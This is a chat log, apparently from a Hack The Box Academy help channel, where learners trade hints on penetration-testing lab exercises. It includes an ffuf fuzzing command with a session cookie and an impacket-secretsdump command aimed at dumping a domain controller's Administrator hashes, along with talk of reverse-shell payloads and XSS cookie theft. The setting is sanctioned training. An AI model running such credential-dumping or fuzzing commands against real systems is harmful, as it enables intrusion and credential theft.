hi guys im stuck on this question for skills assessment documentation and reporting Connect to the testing VM using Xfreerdp and practice testing, documentation, and reporting against the target lab. Once the target spawns, browse to the WriteHat instance on port 443 and authenticate with the provided admin credentials. Play around with the tool and practice adding findings to the database to get a feel for the reporting tools available to us. Remember that all data will be lost once the target resets, so save any practice findings locally! Next, complete the in-progress penetration test. Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host.

Stuck as in you don't know what to do or have done a bunch of stuff and haven't gotten anywhere?

both

Have you gotten any of the flags/answers?

for the module yes, im on the skills assessment but this is the first question of the skills assessment

I'd pick up with the easy stuff. If something was run already, might be worth running it again just to make sure you captured everything and something wasn't missed from the previous assessor.

the things in the previous sections were theory. I'm on the practical section now and have gotten nowhere for days

Yeah but haven't you done the previous modules in the path?

don't think so

Are you not doing the CPTS path or did you just purchase the Documentation & Reporting module?

justt the module

Well if you do not have any pentesting knowledge (professional or via HTB Academy or similar platform) or experience, you are likely not going to get through the skills assessment.

I have done the pen testing modules on HTB Academy and have tried commands on PowerShell, but have gotten nowhere for this question :(. any advice and guidance would be appreciated if anyone has done this module

You may want to do the CPTS path in order, like it is supposed to be taken..

Oh, then you should be good and my previous recommendation still stands. Like I said, think easy stuff, i.e., cred harvesting, shares enum, roasting, etc.

oh ive just been doing the modules from fundamentals to hard

Has anybody completed intro to academy's purple modules?

Enroll in some path. They link each module in the sequence. It's easy to learn this way

any moderator or past CTF player can tell, in coming smacksmash-HTB CTF , will there be digital certificates of participation ????

Can anyone help me?

what for ??

hi

Web Attacks
Bypassing Security Filters
I'm stuck on this
Should I send the request with get

help me

https://academy.hackthebox.com/module/134/section/1178

help please

Just be patient

I was in a hurry, sorry.

Was your question: "should I send as a GET request?"
If so: did you try?

As I understand the question: if I send it as "test", the POST request works, but if I use "test;" the POST does not work, it must be done via GET. But even if I send it as "test", it goes via GET, but I cannot use "test;"

Am I on the right path?

I dont recall verb tampering, just using the provided field

Actually nvm I just changed the request to get after

It didn't take much it just worked

😢 worked, thanks

Is it possible to do things on my own terminal instead of web based terminal?

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

Thats for machines but when I do the cpts roadmap

connecting to academy vpn
😉

Yes its for academy

I do it on the terminal I have at the subject

Hahaha

:D

Oh yeah an other question Im at the Linux fundamentels lesson but when I read about a subject and going to the question the question is way different of the things I have learned is that normal?

It's not as different as you think

Most of the questions will relate to the reading in some way, or a previous section of the module

ZAP hud is iffy sometimes, I never really used/needed it

yes ZAP HUD was such a big pain in the ass for me. For the skill assessment of this module, you don't need to touch zap once if you want

Okey understand

Gonna do my best to ask this question without spoiling content from the module

Pivoting, Tunneling, and Port Forwarding | Remote/Reverse Port Forwarding with SSH

Within the contents of the module, there's an example of how to build a reverse_https payload for a reverse shell. Within that syntax there's reference to a "backupscript.exe" is this exe just an executable with reverse shell code in there? Just trying to understand for notes sake - please @ with replies

this is an msfvenom payload

and the name "backupscript.exe" is just a random name for the payload

Sweet, I thought so, but I just wanted to make sure, thanks

MAKE IT MAKE SENSE!

rip @west iris

it is the spawn, i just poped out into the side to work side by side

ok i see. I am new to this and have had to take time off for an extended health crisis. lik i said "make it make sense" and you made it make sense 🤣

Yo where to download a cyber-skills-benchmark-2025

Is anyone able to assist me with a question involving pivoting with the AD Enum skills assessment part 1.

I need someone to mentor me in hacking

What does this have to do with modules?

Academy will teach you

Well thats the only chat I have access, so I asked here

Read the #rules and follow the instructions in #welcome. No illegal activity like pirating is allowed though.

Cyber benchmark was the last biz ctf

ahh

What? On maun site it says download, Where I suppose to download it or buy or whatever

Idk if they've uploaded the challenges to the platform yet

just tell me where is that, on main site it is just a description and thats all

But we're veering off-topic still

You can search the writeups on the htb gh and find the challenge names off that

so in that book are only write ups?

No

I thought it was about some reserches etc

Look, this is getting off-topic, I suggest linking your account and at least asking in #general

I'm going through and doing some module labs that I need to get done so I can sit the CPTS and there is a particularly frustrating module "Password Attacks" Section: Network Services, now I know how to do all of this already keep that in mind, just checking boxes here so I can sit the exam.
But did anybody else have issues with the last flag for SMB? I have reset this damn box like 4 times, for sure have the proper creds (of which there are only 4 keep that in mind)
and the person who is supposed to have access to said share just flat out doesn't
its super annoying
the share is even named after this person
so I go and look at the "solution" in the writeup, confirmed its indeed what I am doing 1:1 and its saying indeed that should work and they should have access... they do not have access no matter what I do.
You all ran into this?

Naa I mean someone to show me around

No one's going to help with that without charging you or something. This field requires a lot of self learning.

I didn't have any issues with that one. If you want to DM what you have been trying, maybe I can help steer you towards other options to try.

<@&861185840277487616>

oh that was quick

I figured it out my dumb ass was misreading the pass by a single digit lmao

I feel dumb, it was on like my 5th reset where I was like dude wtf

I'm just tired :(

I have a question on Cross-Site Scripting (XSS) > Phishing > XSS Discovery > "Before you continue, try to find an XSS payload that successfully executes JavaScript code on the page."

It's obvious which parameter I should be testing. I tried XSStrike but I don't understand how to use the payloads it generated. I tried entering them in the image URL box but it doesn't seem to do anything.

I tried the payload that we learned to try when script tags don't seem to be allowed.

Slt

I speak frensh

Welcome to the server and that's awesome, however English is the only language that is to be used in this server. Venture over to #welcome follow the steps to have more access on the platform and read over the #rules

link the module page that you are for me, I did this one just need a reminder

https://academy.hackthebox.com/module/103/section/984

one sec let me look

I'm gonna DM you

Did you figure out the pw attack issue? I finished that module already, happy to help.

I did I was just being silly and tired, thank you though

I was legit missing the password by a single digit on that account when typing it out like a derp

only took me like 4-5 resets and me raging, but hey, we get there.

On windows lateral movement module skill assessment, I've got the WSUS user and pw but I'm unable to run a powershell prompt as admin to run the SharpWSUS.exe tool on WSUS. What am I missing here?

I've been stuck here for a while, can anyone provide a hint?

anyone for Introduction to Dynamic Analysis with WinDbg - Skills Assessment Q1? Do not see any relevant memory writes in userspace - not sure what to even look for

Are you still stuck here?

Sure am 😭

You can send me a DM and I'll see what I can do.

on it

@gray yacht are you available to be DM'd about a questions with the AD enum skills assessment part 1?

Are you unable to find answers to your questions by searching this channel?

correct

Sure you can DM.

The module : info gathering , skill assessment (web edition)

What is the API key in the hidden admin directory that you have discovered on the target system

For this fuzzing of subdomain or v host is required , yes or no ?

Can anyone provide some help for the LLM output attack skill assesment is been 5 days am still stuck on it

Use AI if your English is not that great or make some friends on here that are French 😎

Ohhhh guardiannn

Hello all, I'm currently doing the Authentication bypass via parameter modification question under the broken auth module, and I used the following ffuf command to fuzz the correct user ID for admin, but nothing turned up:

ffuf -w tokens.txt -u "http://94.237.121.185:41461/admin.php?user_id=FUZZ" -b "PHPSESSID=38i5ccsqc5vjqdndasl2h6o2h4" -mr "Could not load admin data. Please check your privileges."

tokens.txt is till all 3-digit no.s

can someone tell what I am doing wrong?

Hey did you ever get that figured out?

Try to replicate the request on the last picture of module using curl (means only the URL), then just use ffuf to automate those curls

Can I DM to clarify about this? don't want to spoil this for others

sure

Has anybody completed Intro to Academy's Purple Module?

ask your question maybe i could help

can I dm you?

ok

Hey me too. I am stuck on injection part. What's your issue?

Hey just curious if anyone has any advice or techniques with connection issues to the target box. These issues being session getting dropped prematurely or the web services being unresponsive. I'm currently working on the nibble initial foot hold and privilege escalation challenge however my reverse shell continues to be dropped and the admin login page will drop every so often and reloading the dashboard takes a few attempts and minutes to reload. I've tried gaining access from my local host, the pwnbox, and my VM with the same issues propagating across all of them. I've had my most success from the pwnbox however the sessions wont stay open long enough to complete enough commands to finish the lab.

yo guys sorry for being off topic but i can't acces the general channel in this server. Is it because I haven't verified yet or what? If so, does anyone know where my identifier is

Please read #welcome and #rules it will explain how to get verified

Account identifier can be found here: https://app.hackthebox.com/profile/settings

Well i dont know what we need to do. Like did we need an injection to get a admin_key?

...?

Try it and find out

I did but was not able to find any thing I tried some 3,4 wordlists

Aight DM me
-# Unsolicited DMs will be sent rules... and meme

@wraith ruin will reply here

@wraith ruin Use hashcat or john to crack hashes

i used hashcat but it shows "no hashes loaded"

I'm kinda stuck with the password attacks module, assessment I managed to got Administrator on jump01 (winrm), but don't have a clue what to do next to go to DC01, any tips?

u putted hash in a file?

hey discord, quick question.

for this module Android Application Static Analysis, do i need an x64 computer? im on an m1 mac at the moment

yes

dm ss of terminal

dm the user u r on

okay after spamming commands as fast as possible i made it

I haven't done that module but I also have the m1 and always have problems when compiling tools and then running them on target hosts, so what i do is create a docker with the same architecture as the target. Not sure if your in the same situation but maybe it helps

how is in the sliver module still crackmapexec being used ?

because it was written when CrackMapExec was still active

time for update 🙂

having trouble getting the pivoting part to work

because of older stuff, i think ill switch back to the htb vm, since older stuff is probably installed there.

Hello, can you please help me

I was able to get the DC01.pfx file but don't know how to proceed

when i try to to use the gettgptkinit.py to pass the certificate the command just hangs there until timeout

so can you please walk me through how did u solve it, i got the first flag using the second method but couldn't dump the adminstrator hash even if I had the klist set as the jpinkman, also why do we need the two ip addereses for?

both of those modules are incomplete. it was frustrating to officially finish them tbh lol.

😮

ill eventually have to if i want to go for CAPE

did u do with own box

or htb vm

coz i got to the assumed breach part on my own vm, but the pivoting part etc is to outdated to make it work on my own machine.

could you please elaborate

well u have to put extension.json in sliver

but its outdated so when u install it on your machine it doesnt wanna connect, since its a different version.

talking about the pivoting part in Chisel

i havent touched the CME one for a while, but i got stuck on an answer even after a lot of help. i cant remember exactly what it was. as for sliver, i knew exactly what i needed to finish the skills assessment but i could still never get through. i verified with others that i was doing the right thing, generating my beacons and implants correctly. they also had trouble. so maybe some skill issue but i've used CobaltStrike just fine.

I'd need to look at the modules again to identify properly what the issue is. i obviously moved onto other things for the moment lol.

instead of CME you can use nxc

but i have problems with chisel 😛

always nxc. its the best lol

While doing the assessment from password attacks module, I tried to scan the internal network through proxychains but that didn't work, although scanning network hosts from internal host using dropped binary of nmap worked like a charm. Any idea why nmap wasn't working with proxychains?

cos nmap tries to ping but ICMP requests don't work through proxychains

I tried to use -Pn switch, but it didn't help

probably also some memory issues

Ohh, okey, thanks!

dm

cant seem to get eyewitness to work any help?

Hi guys am new here. Nice to meet you all. I want to learn ethical hacking but don’t no where to start.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Am I supposed to read something in the terminal to the left of the 200 status while using ffuf?

deleted your image bc spoilers

generally speaking, some wordlists have blank lines meaning that if you visit /some/endpoint and the endpoint is blank, it still returns positive

So it's normal that it comes out that way, right? It's just that I've run ffuf several times already and the directory isn't showing up anywhere, and I'm not getting any other errors

im doing the 3º question here

https://academy.hackthebox.com/module/54/section/511

could it be posible im using a small wordlist ?

or you're fuzzing the wrong place

i.e. subdomain

the second question ask for the directories , and i do that on that direcotries and subsecuent ones insisde

yes but there's several subdomains per q1

and using the extension i found

there are multiple extensions

im doind indepth 1 , need to go further ?

as per q2

depth 1/2 is fine

yeah , dont want to spoil , but i already answerd the extensions

i add the m with -e

ye

recursive

but my main point is that there's multiple subdomains

it's possible the one in your screenshot isn't the one you're looking for

i search in all the subdomains i answered in the question before

try depth 3

:)

actually nvm it's not that deep in

i takes forever hahaha

im doding -t 200 but having no errors , so im not missing anything right ?

it could also be your wordlist

i used /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ and medium

could it be i need to pick the large ?

nope the word is in that list

im resetting the machine and trying again , dont know where the problem is ^_^Uu

Hey, does anyone have any contacts at Hack The Box or access to someone from their team? I need to speak to them directly regarding an urgent account issue. Please let me know if you can help

make sure your extension list has the . prefix i.e. .php,.html,.svg

You can contact support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

you'll have to contact support, discord isn't an official mode of platform support

yeah , im so stupid

forgot , web prefixes had in their list :/

for the answer make sure you put :PORT and not the actual port number in the answer

yeah i read that , thanks fcor the advice

what is this server even about

nopeee HTB supports guys never reply

see #welcome

you'll have to be patient; the only way to get help with your account is via support

ok thanks mate

anybody on the prompt injection attack skill assessment? HaWa corp website

I am too. Did you progress?

Working through Meterpreter Tunneling and Port Forwarding

First question - Can you transfer a payload via ssh? I was able to use a separate method for this answer, but transferring a payload won't work --> stuck for second question. Please @ with replies

Good afternoon

Anyone work on Intro to C2 Operations with Sliver Kerberos Delegation & Enumeration and get the s4u impersonation to work? SpecicallyStep 3:

Impersonate a privileged user and request a TGS ticket to access the CIFS service on the target computer. For example, the privileged user can be a local administrator of the target computer, sometimes we can even impersonate the domain admin. But the domain user could be configured as cannot be delegated. In our case, child\Administrator cannot be delegated, however, another domain admin user child\carrot can be delegated, so we impersonate carrot. The service name will not be verified, so even if the target service is eventsystem, we can modify it as the CIFS service.

I run the s4u just like it shows in the module but I don't get access to srv02 per my screen shots

I can't impersonate the carrot user for some reason. I have reverted the machine, reconnected my vpn, I did this yesterday and today after VM, vpn and reconnecting to everything and it still doesn't work.

Still doesn't work

hello guys in Pass the Certificate i have got the password for Administrator but i am not able to login any hint?
What are the contents of flag.txt on Administrator's desktop?

https://tenor.com/view/wojak-brainlet-microwave-smoke-dumb-gif-3026155548321433372

https://tenor.com/view/why-why-tho-why-though-seriously-are-you-serious-gif-5731246

https://cdn.discordapp.com/attachments/1193949643449585665/1394756557257969774/codegramming-ezgif.com-crop.gif

Not working unfortunately

Yeah works fine, can ssh in fine, but scp gets denied I guess?

lmfao

Guys who has done RDP and SOCKS Tunneling with SocksOverRDP

???

feel free to dm mate

Can anybody help me with AI red Team Insecure output handling section? I am stuck!! I am able to get the cookie for the first XSS assignment. I understand the 2nd assignment but getting stuck. a hint would be very welcome 🥹

failed

I'm trying to get the payload to the target to open a shell currently

Ran this directly on Web01 and the commands all work like they should however the impersonation doesn't work and I can't read the c$ drive on srv02.

This is not a server for illegal hacking - that isn't welcome here

lol

This is a server for learning ethical hacking, whereas what you're asking for is illegal.

<@&486603600085123073> for your visibility

Back to this though, I'm unsure how to complete the 2nd question in this module. I'm trying to only use meta / meterpreter because that's what this section is based on. I can't get the payload to transfer to the target host, unsure how to proceed from here

You need to stop pinging folks, read #welcome and #rules.

@digital dirge English only please

I want learn ethical hacking

how i learn

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

can i do ethical hacking from window

You will get a VM to use from HTB that you can utilize if you do not have a VM or something else capable

^

You should be able to use the creds that have been using to access the pivot host to remotely access it and move your payload.

yeah scp isn't working to move it

I just get denied

Then just ssh into it and use wget or curl if they are installed.

so stand up http server from my host first, then just grab from my "server" first?

While I have someone's attention - any idea why I tried to do the autoroute with msf but it keeps failing to validate session? The autoroute module won't run because there's no sessions running - verified that the msf proxy server is running as well

Please refrain from sending a DM unless I've already said to DM me. Are you still stuck on this?

So you've executed your payload and established a meterpreter session?

No I was attempting to utilize the Scanning without ICMP -> SOCKS with Proxychains bit, but I could be missing something.. There was a lot of syntax in this module, just trying to wrap my head around all of it

I don't remember that part of the section. You're working on this section Meterpreter Tunneling & Port Forwarding?

Yeha

Now I'm trying to get the payload using the http server you were talking about, just not finding my file I guess?

Go ahead and send a DM, so I can see what it is that's going on.

Ok guys and hello. Having great trouble with loading SocksOverRdp

plugin

if someone did it

I need help with a project

how do I do the labs in the modules. I am new to this platform

Please read the #rules and follow instructions in #welcome to get access to other channels, this channel is for module talk

https://academy.hackthebox.com/module/15/section/32

If you are new to the platform, Intro to Academy module will help

I also have a question. Do you find it easier to complete the practical exercises in the pwnbox directly or do you have a kali vm where you complete all the exercises.

I use my own (Kali) vm

how do you accomplish this. I get that you have to download the vpn file and connect to it.

https://youtu.be/LMCKbR_wWds

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

thank you!

Is anyone available for a little help on Cross-Site Scripting (XSS) > Phishing > Credential Stealing?
https://academy.hackthebox.com/module/103/section/984

I believe I have everything configured correctly but 'creds.txt' isn't being created. Also, I get 'Not Found' on the victim browser logging in. I do see the creds come across my PHP listener though.
Everything works find if I use a netcat listener. I see the creds come across etc. I'm thinking it must have something to do with the php script?

hey all. Doing the sqlmap skills assessment, and am consistently getting slightly incorrect versions of the DB names. Trying to figure out why, wondering if anyone else has had this before. I have tried many different tamper and threads options, and still get incorrect DB names with 0 entries. I thought maybe it is due to latency with the timing attacks but would love a nudge in the right direction

Hello guys I'm new to you I want advice to start learning cyber security shops

No, my notes say: "nmap's proxy option isn't fully finished yet so not all functions or traffic may be routed through the proxy. We can just use proxychains instead."

Okay

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@limber schooner ^

Yes

Hello everyone, I am on Attacking Windows Credential Manager section. i have gotten the cmd as admin and backed up the credentials, can someone give a small hint on transffering mimikatz or lazagne out to it? i have tried scp and winscp, and cert util. Thank you in advance.

Yesi have got admin pass but not able to login or use it

Yes!

xfreerdp is decent it has the /drive:/directory/location,sharename

Well lets see what's going on.

Just give me 3 m while i run my pc

Hi,
I have a question for Kernel exploit in the windows Privesc for the CVE-2020-0668. In the exemple , they use the MozillaMaintenance service but It seems we don't have the permissions ot start this service in the lab.
https://academy.hackthebox.com/module/67/section/627
I'm wondering, is it normal, should we find another service ? In this case, which to chose without breakinbg our machine ?

so for example that would be 'xfreerdp /c:/shared,mysharedfolder'?

no

it's literally an option labeled /drive:

the /directory/location,sharename can be swapped around too, so you can do /drive:linux,/tmp for

it gets mounted to a share \\tsclient\sharename in the above example \\tsclient\linux

Did you get it figured out? If not DM me

hello guys i someone compromised my original account and used it to spam so i got banned but after i got controle of the account was wondering where i can get in touch with an admin to maybe help me get back in

@fathom pendant can you pls help out with this

og discord account?

i will send you a request with the account

any hint guys hosts file: 10.129.234.174 dc01.inlanefreight.local
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.174 -just-dc-user Administrator 'inlanefreight.local/DC01$'@dc01.inlanefreight.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Bind context rejected: invalid_checksum
[] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[] Cleaning up...

i'm in a call rn but give me an hour or reach out to another mod

oki

How easy is the new cert

don't know it literally just dropped

oh

just sent the request name is MONTERO_FRINCH

You can DM me

ty i will send you a request with my og account rn

just dm me

I think this is the first time I was able to self rescue! It looks like I was running the PHP listener from the wrong directory 🤣

I am stuck on LLM-Output Attack module's skill assessment. I have the admin's password hash but am unable to crack it with all types of wordlists that are typically used. I was able to recover the admin_key but that is also not opening up newer avenues. Am I missing something? Can someone please show me the way. Thanks.

ty @cloud urchin

I'm way more stuck than I thought I was on https://academy.hackthebox.com/module/103/section/984 🤣
I don't want to post spoilers, anyone available for a quick nudge in the right direction?

DM me if you're still stuck